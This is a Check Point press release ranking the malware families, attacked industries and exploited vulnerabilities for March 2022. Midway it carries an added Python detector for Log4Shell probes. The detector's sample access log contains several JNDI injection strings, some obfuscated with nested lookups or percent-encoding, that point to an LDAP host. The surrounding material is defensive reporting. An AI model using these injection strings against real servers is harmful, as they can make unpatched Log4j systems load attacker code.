Press release

Global Threat Index: The list of malware (March 2022)!


Emotet remains the most prevalent malware in March as well, affecting 10% of organizations worldwide.


Check Point Research reports in its Global Threat Index for March 2022 that Emotet affected twice as many organizations as in February, while Agent Tesla climbed from fourth to second place after several malicious spam campaigns.

Emotet is an advanced, self-propagating, modular trojan that uses multiple methods to maintain persistence and evasion techniques to avoid detection. Since its return last November and the recent announcement that Trickbot has been shut down, Emotet has strengthened its position as the most prevalent malware. This was consolidated further this month, as many aggressive email campaigns distributed the botnet, including several Easter-themed phishing attempts that took advantage of the start of the holiday season. These emails were sent to victims around the world; one of them, entitled "good afternoon, happy easter", carried a malicious XLS file that delivered Emotet.

This month Agent Tesla, the advanced RAT that works as a keylogger and information stealer, is the second most prevalent malware, up from fourth place last month. Its rise is due to several new malicious spam campaigns distributing the RAT via malicious xlsx/pdf files worldwide; some of them used the Russia/Ukraine war to lure their victims.

"Technology has evolved in recent years to the point where cybercriminals are increasingly relying on human trust to enter a corporate network. By theming phishing emails around seasonal holidays, such as Easter, they can take advantage of the holiday dynamics and entice their victims to download malicious attachments containing malware such as Emotet.

In the run-up to Holy Saturday and Easter Sunday, expect to see more of these scams, and we urge users to pay close attention, even if the email appears to be from a trusted source. Easter is not the only holiday, and cybercriminals will continue to use the same tactics to cause harm. This month we also noticed that Apache Log4j became the number one most exploited vulnerability again. Even after all the talk about this vulnerability at the end of last year, it is still causing damage months after it was first identified. Organizations must take immediate action to prevent attacks," said Maya Horowitz, VP Research at Check Point Software.

CPR also revealed this month that education/research is still the most attacked industry, followed by the government/military sector and Internet service providers/managed service providers (ISP/MSP). "Web Server Exposed Git Repository Information Disclosure" is now the second most exploited vulnerability, affecting 26% of organizations worldwide, while "Apache Log4j Remote Code Execution" takes first place, impacting 33% of organizations. "HTTP Headers Remote Code Execution (CVE-2020-10826, CVE-2020-10827, CVE-2020-10828, CVE-2020-13756)" keeps third place with a global impact of 26%.

Top Malware Families

*The arrows refer to the change in ranking relative to the previous month.

This month Emotet is still the most prevalent malware, with a global impact of 10% of organizations, followed by Agent Tesla and XMRig, each impacting 2% of organizations worldwide.

  1. ↔ Emotet - an advanced, self-propagating, modular trojan. Emotet once served as a banking trojan and has recently been used to distribute other malware or malicious campaigns. It uses multiple methods to maintain persistence and evasion techniques to avoid detection. In addition, it can be spread through phishing spam emails containing malicious attachments or links.
  2. ↑ Agent Tesla - an advanced RAT that functions as a keylogger and information stealer, capable of monitoring and collecting the victim's keyboard input and system clipboard, taking screenshots, and exfiltrating credentials for a variety of software installed on the victim's machine (including Google Chrome, Mozilla Firefox and the Microsoft Outlook email client).
  3. ↑ XMRig - open-source CPU mining software used to mine the Monero cryptocurrency, first seen in the wild in May 2017.

Top attacked industries worldwide

This month Education/Research is the most attacked industry worldwide, followed by Government/Military and ISP/MSP.

  1. Education / Research
  2. Government / Military
  3. ISP / MSP

Top exploited vulnerabilities

This month "Apache Log4j Remote Code Execution" is the most commonly exploited vulnerability, affecting 33% of organizations worldwide, followed by "Web Server Exposed Git Repository Information Disclosure", which fell from first to second place and affects 26% of organizations worldwide. "HTTP Headers Remote Code Execution" is still in third place on the list of most exploited vulnerabilities, with a global impact of 26%.

  1. ↑ Apache Log4j Remote Code Execution (CVE-2021-44228) - A remote code execution vulnerability exists in Apache Log4j. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
  2. ↓ Web Server Exposed Git Repository Information Disclosure - An information disclosure vulnerability has been reported in Git Repository. Successful exploitation of this vulnerability could allow the unintentional disclosure of account information.
  3. ↔ HTTP Headers Remote Code Execution (CVE-2020-10826, CVE-2020-10827, CVE-2020-10828, CVE-2020-13756) - HTTP headers let the client and the server pass additional information with an HTTP request. A remote attacker may use a vulnerable HTTP header to run arbitrary code on the victim's machine.
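Since the report singles out CVE-2021-44228 as the most exploited vulnerability months after disclosure, the check a defender wants is whether Log4Shell probes are hitting their own web servers. The following is an added example, not code from Check Point or from this report: a small Python scanner that flags the `${jndi:...}` lookup that triggers the bug in logged request data, after undoing the nested-lookup obfuscation (`${lower:j}`, `${::-j}` and similar) that attackers use to slip past naive string matching. The access-log lines are constructed for the example, the IP addresses are documentation ranges, and the lookup-resolution rules are an approximation of Log4j's behaviour limited to the evasion forms commonly seen in the wild.

```python
"""Flag Log4Shell (CVE-2021-44228) probes in web access logs.

Added example; not Check Point's code. CVE-2021-44228 is triggered when
Log4j 2.x evaluates a ${jndi:...} lookup found in logged input. Probes
seen in the wild hide that string behind nested lookups such as
${lower:j} or the ${x:-default} form; this script resolves those first.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Innermost ${...} lookup: no nested braces inside the body.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The lookup we ultimately want to catch (Log4j matches the prefix case-insensitively).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def _resolve_inner(expr: str) -> str:
    """Approximate Log4j's evaluation of one innermost lookup body.

    Assumption: only the common evasion forms are modelled:
      ${lower:X} / ${upper:X}    -> case conversion of X
      ${::-X} / ${env:NOPE:-X}   -> the default value X after ':-'
    Any other lookup without a default (e.g. ${date:yyyy}) resolves to ''.
    """
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    key, sep, value = expr.partition(":")
    if sep:
        key = key.strip().lower()
        if key == "lower":
            return value.lower()
        if key == "upper":
            return value.upper()
    return ""


def normalize(text: str, max_rounds: int = 20) -> str:
    """Resolve nested lookups inside-out until only a ${jndi:...} (or nothing) is left."""
    for _ in range(max_rounds):
        def repl(m):
            expr = m.group(1)
            if expr.lstrip().lower().startswith("jndi:"):
                return m.group(0)  # keep the payload intact for reporting
            return _resolve_inner(expr)

        new_text = INNER_LOOKUP.sub(repl, text)
        if new_text == text:
            break
        text = new_text
    return text


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, resolved JNDI lookup) for every suspicious line.

    Lines are URL-decoded first because access logs store request targets,
    and often User-Agent values, percent-encoded.
    """
    hits = []
    for number, line in enumerate(lines, 1):
        resolved = normalize(unquote(line))
        m = JNDI_LOOKUP.search(resolved)
        if m:
            end = resolved.find("}", m.start())
            payload = resolved[m.start():end + 1] if end != -1 else resolved[m.start():]
            hits.append((number, payload))
    return hits


# Constructed sample access log (combined format) for this example only.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Mar/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    # Plain probe in the User-Agent header
    '198.51.100.7 - - [09/Mar/2022:10:01:07 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    # Obfuscated with ${lower:...} in the query string
    '198.51.100.7 - - [09/Mar/2022:10:01:09 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7/b} HTTP/1.1" 400 0 "-" "curl/7.79"',
    # Percent-encoded and obfuscated with ${::-...} defaults
    '198.51.100.7 - - [09/Mar/2022:10:01:12 +0000] "GET / HTTP/1.1" 200 612 "-" "%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7Ddi%3Aldap%3A%2F%2F198.51.100.7%2Fc%7D"',
    # Benign lookup-looking text that must not be flagged
    '10.0.0.8 - - [09/Mar/2022:10:02:00 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, payload in scan_lines(SAMPLE_LOG):
        print(f"line {number}: {payload}")
```

Run against a real access log by replacing `SAMPLE_LOG` with the file's lines; a hit means a probe reached the server, not that it succeeded, so the follow-up is to confirm the Log4j version on anything that logged the request and to look for outbound LDAP/RMI connections from it around the timestamp.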

Top mobile malware

This month AlienBot is the most prevalent mobile malware, followed by xHelper and FluBot.

  1. AlienBot - The AlienBot malware family is a Malware-as-a-Service (MaaS) for Android devices that allows a remote attacker, as a first step, to inject malicious code into legitimate financial applications. The attacker obtains access to the victims' accounts and eventually takes full control of their device.
  2. xHelper - A malicious application seen in the wild since March 2019, used to download other malicious applications and display advertisements. The application is capable of hiding itself from the user and reinstalling itself if it is uninstalled.
  3. FluBot - FluBot is an Android malware distributed via phishing SMS messages (smishing), most often impersonating logistics delivery brands. Once the user clicks the link in the message, they are redirected to download a fake application that contains FluBot. Once installed, the malware has various capabilities for harvesting credentials and supporting the smishing operation itself, including uploading contact lists and sending SMS messages to other phone numbers.

The complete list of the most prevalent malware threats in Greece for March 2022 is:

Emotet - an advanced, self-propagating, modular trojan. Emotet once served as a banking trojan and has recently been used to distribute other malware or malicious campaigns. It uses multiple methods to maintain persistence and evasion techniques to avoid detection. In addition, it can be spread through phishing spam emails containing malicious attachments or links.

LokiBot - LokiBot was first identified in February 2016 and is a commodity infostealer with versions for both Windows and Android OS. It harvests credentials from a variety of applications, web browsers, email clients, IT administration tools such as PuTTY, and more. LokiBot is sold on hacking forums, and its source code is believed to have been leaked, which has enabled numerous variants. Since late 2017, some Android versions of LokiBot include ransomware functionality in addition to their info-stealing capabilities.

Agent Tesla - Agent Tesla is an advanced RAT that functions as a keylogger and password stealer and has been active since 2014. Agent Tesla can monitor and collect the victim's keyboard input and system clipboard, take screenshots, and exfiltrate credentials for a variety of software installed on the victim's machine (including Google Chrome, Mozilla Firefox and the Microsoft Outlook email client). Agent Tesla is sold on various online markets and hacking forums.

Remcos - Remcos is a RAT that first appeared in the wild in 2016. Remcos is distributed via malicious Microsoft Office documents attached to SPAM emails, and is designed to bypass Microsoft Windows UAC security and execute malware with high-level privileges.

QRat - QRat is a Java-based remote access trojan that also acts as a backdoor with keylogging and other espionage tools. QRat was introduced in 2015 and has since been sold as a MaaS model on various forums.

XMRig - XMRig is open-source CPU mining software used to mine the Monero cryptocurrency. Threat actors often abuse this open-source software by integrating it into their malware to conduct illegal mining on victims' devices.

The Global Threat Impact Index and the Check Point Software ThreatCloud Map are based on the company's ThreatCloud intelligence, the largest collaborative network for fighting cybercrime, which delivers threat data and attack trends drawn from a global network of threat sensors.

The ThreatCloud database inspects over 3 billion websites and 600 million files daily, and identifies more than 250 million malware activities every day.


